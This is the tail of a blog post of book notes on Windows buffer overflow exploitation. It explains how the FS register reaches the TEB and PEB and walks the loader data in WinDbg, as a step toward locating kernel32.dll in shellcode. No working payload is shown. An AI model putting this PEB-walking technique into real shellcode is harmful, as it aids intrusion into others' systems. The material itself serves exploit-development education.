<p align="center" class='item-img' data-src='/images/books/bufferoverflow/3.11.png'><img src="/images/books/bufferoverflow/3.11.png" width="700">
</p>

<script type="math/tex; mode=display">
\begin{align*}
FS + 0x00 &= \&\_TEB\\
 &= \&(\_TEB.NtTib)\\
 &= \&(\_TEB.NtTib.ExceptionList)\\

FS + 0x18 &= \&(\_TEB.NtTib.Self)\\
&= \&(\&(\_TEB.NtTib))\\
&= \&(\&(\_TEB))\\

FS + 0x30 &= \&(\_TEB.ProcessEnvironmentBlock)\\
&= \&(\&(\_PEB))
\end{align*}</script><p>These three expresions are equivalent to:</p>
<script type="math/tex; mode=display">
\begin{align*}
*(FS+0x00) &= \_TEB\\
&=\_TEB.NtTib\\
&=\_TEB.NtTib.ExceptionList\\

*(FS+0x18) &= \_TEB.NtTib.Self\\
&=(\_TEB.NtTib)\\
&=(\_TEB)\\

*(FS+0x30) &= \_TEB.ProcessEnvironmentBlock\\
&= \&(\_PEB)
\end{align*}</script><hr>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">int main()<br>&#123;<br>    __try<br>    &#123;<br>        int i = 0;<br>    &#125;<br>    __except(1)<br>    &#123;<br>        int j = 1;<br>    &#125;<br><br>    return 0;<br>&#125;<br></code></pre></td></tr></table></figure>
<p>This code has assembly codes like this:<br><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">PUSH EBP<br>MOV EBP,ESP<br>PUSH FF<br>PUSH 00404000<br>PUSH 00401140<br>MOV EAX,FS:[00000000]<br>PUSH EAX<br>MOV DWORD PTR FS:[00000000],ESP<br></code></pre></td></tr></table></figure></p>
<p>We can rewrite the relationship of FS and _TEB in form of FS:[Offset]</p>
<script type="math/tex; mode=display">
\begin{align*}
FS:[0x00] &= \_TEB\\
&=\_TEB.NtTib\\
&=\_TEB.NtTib.ExceptionList\\

FS:[0x18] &= \_TEB.NtTib.Self\\
&=(\_TEB.NtTib)\\
&=(\_TEB)\\

FS:[0x30] &= \_TEB.ProcessEnvironmentBlock\\
&= \&(\_PEB)
\end{align*}</script><hr>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">0:000&gt; dt ntdll!_CLIENT_ID<br></code></pre></td></tr></table></figure>
<p align="center" class='item-img' data-src='/images/books/bufferoverflow/3.12.png'><img src="/images/books/bufferoverflow/3.12.png" width="800">
</p>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">0:000&gt; dt ntdll!_PEB_LDR_DATA<br></code></pre></td></tr></table></figure>
<p align="center" class='item-img' data-src='/images/books/bufferoverflow/3.13.png'><img src="/images/books/bufferoverflow/3.13.png" width="800">
</p>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">0:000&gt; !peb<br></code></pre></td></tr></table></figure>
<p align="center" class='item-img' data-src='/images/books/bufferoverflow/3.14.png'><img src="/images/books/bufferoverflow/3.14.png" width="800">
</p>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">0:000&gt; dt ntdll!_PEB_LDR_DATA 774b5da0<br></code></pre></td></tr></table></figure>
<p align="center" class='item-img' data-src='/images/books/bufferoverflow/3.15.png'><img src="/images/books/bufferoverflow/3.15.png" width="800">
</p>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">0:000&gt; dt ntdll!_PEB_LDR_DATA 774b5dbc<br></code></pre></td></tr></table></figure>
<script type="math/tex; mode=display">
774b5da0 + 0x01c = 774b5dbc</script><p align="center" class='item-img' data-src='/images/books/bufferoverflow/3.16.png'><img src="/images/books/bufferoverflow/3.16.png" width="800">
</p>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">0:000&gt; dl 774b5dbc<br></code></pre></td></tr></table></figure>
<p align="center" class='item-img' data-src='/images/books/bufferoverflow/3.17.png'><img src="/images/books/bufferoverflow/3.17.png" width="800">
</p>

<h3 id="Obtain-LoadLibraryA-from-the-ImageBase-of-kernel32-dll"><a href="#Obtain-LoadLibraryA-from-the-ImageBase-of-kernel32-dll" class="headerlink" title="Obtain LoadLibraryA() from the ImageBase of kernel32.dll"></a>Obtain LoadLibraryA() from the ImageBase of kernel32.dll</h3><h1 id="Chapter-4-Real-World-Practice"><a href="#Chapter-4-Real-World-Practice" class="headerlink" title="Chapter 4 - Real World Practice"></a>Chapter 4 - Real World Practice</h1><div id="paginator"></div></div><div id="post-footer"><div id="pages"><div class="footer-link" style="width: 50%;text-align:right;border-right:1px #fe2 solid"><a href="/2026/01/02/2026-1-2-NoteMasteringCppPointer/">← Next [Book] Mastering C/C++ Pointer</a></div><div class="footer-link" style="width: 50%;right:1px;border-left:1px #fe2 solid"><a href="/2026/01/02/2026-1-2-NoteCpp20forProgrammers/">[Book] C++ 20 for Programmers - An Objects-Natural Appraoch Prev →</a></div></div></div></div><div class="bottom-btn"><div><a id="to-top" onClick="scrolls.scrolltop();" title="To Top" style="opacity: 0; display: none;">∧</a><a id="to-index" href="#toc-div" title="To Catalog">≡</a><a id="color-mode" onClick="colorMode.change()" title="Change Theme"></a></div></div></article><aside><div id="about"><a href="/" id="logo"><img src="https://avatars.githubusercontent.com/u/110074064?v=4" alt="Logo"></a><h1 id="Dr"><a href="/">ISSAC</a></h1><div id="description"><p>Everything is failing...</p></div><div id="social-links"><a class="social" target="_blank" rel="noopener" href="https://github.com/iss4cf0ng"><i class="GitHub" alt="GitHub"></i></a><a class="social" target="_blank" rel="noopener" href="https://zeroday.hitcon.org/user/ISSAC_f0ng"><i class="ZeroDay Hitcon" alt="ZeroDay Hitcon"></i></a></div></div><div id="aside-block"><div id="toc-div"><h1>Catalog</h1><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#El-libro"><span class="toc-number">1.</span> <span class="toc-text">El libro</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Introduction"><span class="toc-number">2.</span> <span class="toc-text">Introduction</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Reflection"><span class="toc-number">3.</span> <span class="toc-text">Reflection</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Chapter-1-Set-Up"><span class="toc-number">4.</span> <span class="toc-text">Chapter 1 - Set Up</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#1-1-VM-and-Windos-XP-SP3"><span class="toc-number">4.1.</span> <span class="toc-text">1.1 - VM and Windos XP SP3</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#1-2-Tools"><span class="toc-number">4.2.</span> <span class="toc-text">1.2 - Tools</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Dev-C"><span class="toc-number">4.2.1.</span> <span class="toc-text">Dev-C++</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Visual-C-2010-Express"><span class="toc-number">4.2.2.</span> <span class="toc-text">Visual C++ 2010 Express</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Visual-C-2013-Express"><span class="toc-number">4.2.3.</span> <span class="toc-text">Visual C++ 2013 Express</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#NASM"><span class="toc-number">4.2.4.</span> <span class="toc-text">NASM</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#OllyDbg"><span class="toc-number">4.2.5.</span> <span class="toc-text">OllyDbg</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#WinDbg"><span class="toc-number">4.2.6.</span> <span class="toc-text">WinDbg</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Immunity-Debugger"><span class="toc-number">4.2.7.</span> <span class="toc-text">Immunity Debugger</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#CFF-Explorer"><span class="toc-number">4.2.8.</span> <span class="toc-text">CFF Explorer</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#HxD"><span class="toc-number">4.2.9.</span> <span class="toc-text">HxD</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Process-Explorer"><span class="toc-number">4.2.10.</span> <span class="toc-text">Process Explorer</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Metasploit"><span class="toc-number">4.2.11.</span> <span class="toc-text">Metasploit</span></a></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Chapter-2-Change-the-Procedure-of-a-Program"><span class="toc-number">5.</span> <span class="toc-text">Chapter 2 - Change the Procedure of a Program</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#2-2-Change-the-Procedure-of-a-Program-via-Buffer-Overflow"><span class="toc-number">5.1.</span> <span class="toc-text">2.2 - Change the Procedure of a Program via Buffer Overflow</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#2-3-Debugging-with-OllyDbg"><span class="toc-number">5.2.</span> <span class="toc-text">2.3 - Debugging with OllyDbg</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#2-4-Basic-Buffer-Overflow"><span class="toc-number">5.3.</span> <span class="toc-text">2.4 - Basic Buffer Overflow</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#3-3-Using-Plugin-to-Obtain-Shellcode"><span class="toc-number">5.4.</span> <span class="toc-text">3.3 - Using Plugin to Obtain Shellcode</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#3-4-Using-nasm-shell-rb-from-Metasploit-to-Obtain-Shellcode"><span class="toc-number">5.5.</span> <span class="toc-text">3.4 - Using nasm_shell.rb from Metasploit to Obtain Shellcode</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#3-5-Using-NASM-to-Obtain-Shellcode"><span class="toc-number">5.6.</span> <span class="toc-text">3.5 - Using NASM to Obtain Shellcode</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#3-6-Review-the-First-Shellcode"><span class="toc-number">5.7.</span> <span class="toc-text">3.6 - Review the First Shellcode</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Obtain-the-ImageBase-Address-of-kernel32-dll-via-PEB"><span class="toc-number">5.7.1.</span> <span class="toc-text">Obtain the ImageBase Address of kernel32.dll via PEB</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Obtain-LoadLibraryA-from-the-ImageBase-of-kernel32-dll"><span class="toc-number">5.7.2.</span> <span class="toc-text">Obtain LoadLibraryA() from the ImageBase of kernel32.dll</span></a></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Chapter-4-Real-World-Practice"><span class="toc-number">6.</span> <span class="toc-text">Chapter 4 - Real World Practice</span></a></li></ol></div></div><footer><nobr>Published with <a target="_blank" rel="noopener" href="http://hexo.io">Hexo</a></nobr><wbr><nobr> Theme <a target="_blank" rel="noopener" href="https://github.com/Yue-plus/hexo-theme-arknights">Arknights</a></nobr><wbr><nobr>by <a target="_blank" rel="noopener" href="https://github.com/Yue-plus">Yue_plus</a></nobr></footer></aside></main><canvas id="canvas-dust"></canvas><script src="/js/search.js"></script><script src="/js/arknights.js"></script><script src="//unpkg.com/lightgallery@2.7.1/lightgallery.min.js"></script><script src="//unpkg.com/lightgallery@2.7.1/plugins/zoom/lg-zoom.min.js"></script><script src="//unpkg.com/lightgallery@2.7.1/plugins/thumbnail/lg-thumbnail.min.js"></script><script src="/js/pjax.js"></script><script class="pjax-js">reset= () => {code.findCode();
document.querySelector('.lg-container')?.remove()
lightGallery(document.getElementById('post-bg'), {
  plugins: [lgZoom,lgThumbnail],
  selector: '.item-img'})}</script><script>window.addEventListener("load",() => {pjax = new Pjax({
 cacheBust: false,
 selectors: ['title','article','#aside-block','.pjax-js'],
 switches: {'article': Pjax.switches.sideBySide},
 switchesOptions: {
   'article': {
     classNames: {
       remove: "pjax-out",
       add: "pjax-in"
     }
   }
 }
});
document.addEventListener("pjax:complete", reset);reset()})</script><script src="/js/slide.js"></script></body></html>